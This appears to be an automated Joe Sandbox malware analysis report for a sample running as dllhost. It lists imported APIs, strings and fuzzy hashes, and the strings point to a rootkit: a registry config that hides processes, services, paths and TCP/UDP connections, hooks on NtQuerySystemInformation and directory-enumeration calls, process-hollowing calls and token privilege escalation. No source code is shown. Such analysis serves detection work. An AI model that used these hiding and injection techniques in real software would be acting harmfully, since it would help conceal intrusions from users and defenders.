                                                  • Source File: 00000005.00000003.1924663454.000002D8B0A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A30000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_3_2d8b0a30000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 000990a0b745e2d7aebf751e9a901d84576f17a5eee71522b46ce82416c04370
                                                  • Instruction ID: 1295edf7146d591f88233785d07b585e877392b20ea293b54b20dde7404d6ba1
                                                  • Opcode Fuzzy Hash: 000990a0b745e2d7aebf751e9a901d84576f17a5eee71522b46ce82416c04370
                                                  • Instruction Fuzzy Hash: 46912472B412A087EB648F25D428B6DB391F755BDCF649923DE4987B88DE38EC12C710

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 227 140002d38-140002d3c call 140002d4c 229 140002d41-140002d43 ExitProcess 227->229
                                                  APIs
                                                    • Part of subcall function 0000000140002D4C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D74
                                                    • Part of subcall function 0000000140002D4C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D84
                                                    • Part of subcall function 0000000140002D4C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D9E
                                                    • Part of subcall function 0000000140002D4C: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DB5
                                                    • Part of subcall function 0000000140002D4C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002DED
                                                    • Part of subcall function 0000000140002D4C: GetLastError.KERNEL32 ref: 0000000140002DF7
                                                    • Part of subcall function 0000000140002D4C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E00
                                                    • Part of subcall function 0000000140002D4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E29
                                                    • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E59
                                                    • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E89
                                                    • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E9D
                                                    • Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EAB
                                                    • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBE
                                                    • Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ECC
                                                  • ExitProcess.KERNEL32 ref: 0000000140002D43
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2937186859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000005.00000002.2936370774.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938038866.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938877817.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Process$Heap$OpenValue$AllocQueryToken$AdjustCloseCurrentErrorExitHandleLastLookupPrivilegePrivileges
                                                  • String ID:
                                                  • API String ID: 2472495637-0
                                                  • Opcode ID: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                                  • Instruction ID: 466ff6e6ce30b805044d1f2dc35dca8baccd3c328fc793c3ea1e6e53ebee4899
                                                  • Opcode Fuzzy Hash: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                                  • Instruction Fuzzy Hash: 15A002F0F2258083EB0AB7B7B85A3DD25B1ABAC781F100416B2024B2B3DE3C48954759
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2937186859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000005.00000002.2936370774.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938038866.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938877817.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Process$Open$CloseDeleteFileInformationTokenValue$AllocAuthorityExitFindHandleHeapLocalName$ChangeCountEnumErrorFreeLastModuleNotificationPathProcessesQueryReadWow64lstrlen
                                                  • String ID: SOFTWARE$open$x4dll32$x4dll64$x4stager$x4svc32$x4svc64
                                                  • API String ID: 3656275064-2888860103
                                                  • Opcode ID: 8ad32736029bdb7280f1b4a6bf37e8b6e426ac2af94e9139ffc5d504c9a97da0
                                                  • Instruction ID: 745bad6354c42f2b952ccd5d4046a56312cc6dda082fec9bbf0fdf5a5b904edb
                                                  • Opcode Fuzzy Hash: 8ad32736029bdb7280f1b4a6bf37e8b6e426ac2af94e9139ffc5d504c9a97da0
                                                  • Instruction Fuzzy Hash: B8B105F220468196EB7BDF27F8543E922A9F74C7C4F448125BB0A47ABADE39C645C704
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2937186859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000005.00000002.2936370774.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938038866.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938877817.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
                                                  • String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
                                                  • API String ID: 1036100660-1371749706
                                                  • Opcode ID: 062723520bc959b99614c26b60837a5fa848bce833f489094e5110284047cdb9
                                                  • Instruction ID: fe181f3da7762b1cf8407140d3e190fa013b7b60483d6e0a4c0671c43d788581
                                                  • Opcode Fuzzy Hash: 062723520bc959b99614c26b60837a5fa848bce833f489094e5110284047cdb9
                                                  • Instruction Fuzzy Hash: ACD16FB270568187EB65CF63F84479AB7A0F788BC4F044025EB8A47BA4DF78D599CB04
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2937186859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000005.00000002.2936370774.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938038866.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938877817.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: 3db9478a101194b55b940351d2e6744c1199954fa76c07e8abb2f2f05a3be27a
                                                  • Instruction ID: cbe0a9e96035c6652df35f1bebe582e7c0167c489293dce8c24ece8bd57d0938
                                                  • Opcode Fuzzy Hash: 3db9478a101194b55b940351d2e6744c1199954fa76c07e8abb2f2f05a3be27a
                                                  • Instruction Fuzzy Hash: C35128B2604B8486EB56DF62F4483AA77A1F78CBD5F444124EB4A07B79DF38C555C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 5fbd9173ce4d782f6a43f1b6ae1fcce4f28eac928785eaf1fb737f6660f8b0ea
                                                  • Instruction ID: 8b3e719ce6530cd2c5bf2fecbab0af17b9fa872bd31eafcaf6193e319056c4a0
                                                  • Opcode Fuzzy Hash: 5fbd9173ce4d782f6a43f1b6ae1fcce4f28eac928785eaf1fb737f6660f8b0ea
                                                  • Instruction Fuzzy Hash: F6B1D472A10A5082EB64DF25D5287A977B4F746B8CF64A827EE49D3795DF35CC80C340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 9234f04ebf3d0d18ada26ad48c251ddc084bcc865350783e627834a553364bb5
                                                  • Instruction ID: 0e09093eef9a4d27dcf55e2a6df0b278240dfc9b29a8f78f978c4ee019d80afb
                                                  • Opcode Fuzzy Hash: 9234f04ebf3d0d18ada26ad48c251ddc084bcc865350783e627834a553364bb5
                                                  • Instruction Fuzzy Hash: 84314172604B808AEB608F60E8547ED7774F786748F54992BDB4E87B99DF38C948C710
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 25459dfd405c3fd6abe62832c5e49632febe87f8ccdadd93aea5d47d5ebeda6d
                                                  • Instruction ID: 05552b6251d70995edd69684c00d2b824eee9abc976ed70133154ed3b1799eb1
                                                  • Opcode Fuzzy Hash: 25459dfd405c3fd6abe62832c5e49632febe87f8ccdadd93aea5d47d5ebeda6d
                                                  • Instruction Fuzzy Hash: 57315132614F8086EB60CF25E8443EE77A4F78A798F605927EA9D87B55DF38C945CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: e1208e257ec3ecfd7a62d9249f0af5cdd52c99c47e99b6bb550ebf232a0e338b
                                                  • Instruction ID: f74258afca8cb37a37a63d9668c993332d50d89c216c460d0edf6a15e4323ce3
                                                  • Opcode Fuzzy Hash: e1208e257ec3ecfd7a62d9249f0af5cdd52c99c47e99b6bb550ebf232a0e338b
                                                  • Instruction Fuzzy Hash: 35113C22710F008AEB00CF60E8583B933B4F71A75CF546E22EA6D86BA5DF78D954C340
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bd25d4d8285f6c25f2ef6689297c78baf6b96583aad7e8ebbd56bff4a0ccf50e
                                                  • Instruction ID: b9ef0d06c938495aba31f506104b7abbc7365cfebcff2d0aee57794011ab09cc
                                                  • Opcode Fuzzy Hash: bd25d4d8285f6c25f2ef6689297c78baf6b96583aad7e8ebbd56bff4a0ccf50e
                                                  • Instruction Fuzzy Hash: 1451D422B0079085FB20DB72E84879E7BB1F756BD8F249517EE5AA7B95DE38C801C700
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000003.1924663454.000002D8B0A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A30000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_3_2d8b0a30000_dllhost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fca3be283da770b9d81563a57aca79fcbe90aedeee8084f510c3064b666beab0
                                                  • Instruction ID: bab6eaa2aeaabf30cbba21d6bf2d22a47f516631d366eabaef446b73bcc717e7
                                                  • Opcode Fuzzy Hash: fca3be283da770b9d81563a57aca79fcbe90aedeee8084f510c3064b666beab0
                                                  • Instruction Fuzzy Hash: 87F062727146948ADFA49F38A80375977E1F388384F90991BD6C9C3B04DA7C84608F04

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2937186859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000005.00000002.2936370774.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938038866.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938877817.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
                                                  • String ID: SOFTWARE\x4config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 3993315683-1036178600
                                                  • Opcode ID: d25d6e1eb93a4dbee93287b992e03f9dcbd0d07d084bed7a00c14440c76ebe5a
                                                  • Instruction ID: b6f6b9633429cee1016b119da5a64b4b82e75d122d4c5648de9206a05e06990f
                                                  • Opcode Fuzzy Hash: d25d6e1eb93a4dbee93287b992e03f9dcbd0d07d084bed7a00c14440c76ebe5a
                                                  • Instruction Fuzzy Hash: D971D3B6310A5086EB22EF66F8507D923A4FB88BC8F016125FB4D97A7ADE38C554C744

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\x4config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 2135414181-1036178600
                                                  • Opcode ID: 00666697048e66f47c213fec616e4e8a9e118adeb47c65b252f020183c468c1e
                                                  • Instruction ID: 4f4cdf028bf162b20b6032fab256d47854a5ed58f7caebcc5595af89453bbdcd
                                                  • Opcode Fuzzy Hash: 00666697048e66f47c213fec616e4e8a9e118adeb47c65b252f020183c468c1e
                                                  • Instruction Fuzzy Hash: C2713C26710A1086EB109F31E89869D3BB4F78AB9CF54A923DD4EC7B69DF34C845C740
                                                  APIs
                                                  • GetCurrentThread.KERNEL32 ref: 000002D8B0A61D53
                                                    • Part of subcall function 000002D8B0A6208C: GetModuleHandleA.KERNEL32(?,?,?,000002D8B0A61D85), ref: 000002D8B0A620A4
                                                    • Part of subcall function 000002D8B0A6208C: GetProcAddress.KERNEL32(?,?,?,000002D8B0A61D85), ref: 000002D8B0A620B5
                                                    • Part of subcall function 000002D8B0A65F20: GetCurrentThreadId.KERNEL32 ref: 000002D8B0A65F5B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread$AddressHandleModuleProc
                                                  • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$ntdll.dll$pdh.dll$sechost.dll
                                                  • API String ID: 4175298099-1819131285
                                                  • Opcode ID: ec902621774e6c93ddf96b1cef49485a110a34d9b18634e59d3ce01917ac58d9
                                                  • Instruction ID: 39c79a529eafde14a0478ea42069a11d8783717e4e7cc20680df9c5a80c10e3c
                                                  • Opcode Fuzzy Hash: ec902621774e6c93ddf96b1cef49485a110a34d9b18634e59d3ce01917ac58d9
                                                  • Instruction Fuzzy Hash: CD417665A00E4AE0FE05EBA4F8697D52730B74638CFA1BC13D40A975B2DE7C8E49C381
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: e2ed30d8db31d81b4c0daa00d2e475a39dc02a101f7e26d9b862c19419363001
                                                  • Instruction ID: c08204f3645191be8972941176894c851a11d03d2a0b76e8c3ad3d6d5b6810de
                                                  • Opcode Fuzzy Hash: e2ed30d8db31d81b4c0daa00d2e475a39dc02a101f7e26d9b862c19419363001
                                                  • Instruction Fuzzy Hash: 45516E72600B8486EB14CF62E44C35E7BA1F78AF98F649526DE4987B69DF3CD449C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000003.1924663454.000002D8B0A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A30000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_3_2d8b0a30000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID: `eh vector constructor iterator'$`virtual displacement map'$or iterator'$r iterator'
                                                  • API String ID: 190073905-2094522767
                                                  • Opcode ID: 12e6944f9e020bf7bba539df7bc83e8ef27753177fa0d3ccda2e8152a8c18693
                                                  • Instruction ID: 94879e94fa78791aca20452cae779617a6b0eebe23d92748fee7d5740a6dbc7e
                                                  • Opcode Fuzzy Hash: 12e6944f9e020bf7bba539df7bc83e8ef27753177fa0d3ccda2e8152a8c18693
                                                  • Instruction Fuzzy Hash: BF81CF216806018AFB64AB65A4493AD66E0BB87F8CF74FC17EA49C7796DF38DC458700
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,000002D8B0A713BB,?,?,?,000002D8B0A70DAC,?,?,?,000002D8B0A6D19F), ref: 000002D8B0A6D787
                                                  • FlsGetValue.KERNEL32(?,?,?,000002D8B0A713BB,?,?,?,000002D8B0A70DAC,?,?,?,000002D8B0A6D19F), ref: 000002D8B0A6D79C
                                                  • FlsSetValue.KERNEL32(?,?,?,000002D8B0A713BB,?,?,?,000002D8B0A70DAC,?,?,?,000002D8B0A6D19F), ref: 000002D8B0A6D7BD
                                                  • FlsSetValue.KERNEL32(?,?,?,000002D8B0A713BB,?,?,?,000002D8B0A70DAC,?,?,?,000002D8B0A6D19F), ref: 000002D8B0A6D7EA
                                                  • FlsSetValue.KERNEL32(?,?,?,000002D8B0A713BB,?,?,?,000002D8B0A70DAC,?,?,?,000002D8B0A6D19F), ref: 000002D8B0A6D7FB
                                                  • FlsSetValue.KERNEL32(?,?,?,000002D8B0A713BB,?,?,?,000002D8B0A70DAC,?,?,?,000002D8B0A6D19F), ref: 000002D8B0A6D80C
                                                  • SetLastError.KERNEL32(?,?,?,000002D8B0A713BB,?,?,?,000002D8B0A70DAC,?,?,?,000002D8B0A6D19F), ref: 000002D8B0A6D827
                                                  • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002D8B0A713BB,?,?,?,000002D8B0A70DAC,?,?,?,000002D8B0A6D19F), ref: 000002D8B0A6D85D
                                                  • FlsSetValue.KERNEL32(?,?,00000001,000002D8B0A6F61C,?,?,?,?,000002D8B0A6C8EF,?,?,?,?,?,000002D8B0A67EA0), ref: 000002D8B0A6D87C
                                                    • Part of subcall function 000002D8B0A6E01C: HeapAlloc.KERNEL32(?,?,00000000,000002D8B0A6D952,?,?,?,000002D8B0A6E005,?,?,?,?,000002D8B0A6E0C8), ref: 000002D8B0A6E071
                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D8B0A713BB,?,?,?,000002D8B0A70DAC,?,?,?,000002D8B0A6D19F), ref: 000002D8B0A6D8A4
                                                    • Part of subcall function 000002D8B0A6E094: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,?,?,?,?,000002D8B0A663FA), ref: 000002D8B0A6E0AA
                                                    • Part of subcall function 000002D8B0A6E094: GetLastError.KERNEL32(?,?,?,?,?,?,?,000002D8B0A663FA), ref: 000002D8B0A6E0B4
                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D8B0A713BB,?,?,?,000002D8B0A70DAC,?,?,?,000002D8B0A6D19F), ref: 000002D8B0A6D8B5
                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D8B0A713BB,?,?,?,000002D8B0A70DAC,?,?,?,000002D8B0A6D19F), ref: 000002D8B0A6D8C6
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Value$ErrorLast$AllocBoundaryDeleteDescriptorHeap
                                                  • String ID:
                                                  • API String ID: 1787197055-0
                                                  • Opcode ID: 61107eddd0a8e6bd0c478185a7cd5dc7639332fade6589c761d9e8646912cfb4
                                                  • Instruction ID: 6a4a9c4524238e439e0b69769fc6307a7a37169381ff9922328f75c894f4e85c
                                                  • Opcode Fuzzy Hash: 61107eddd0a8e6bd0c478185a7cd5dc7639332fade6589c761d9e8646912cfb4
                                                  • Instruction Fuzzy Hash: F8411B20E0124041F968A731556D36922B27B577FCF347F27E93ACB6D7DE289C41A301
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
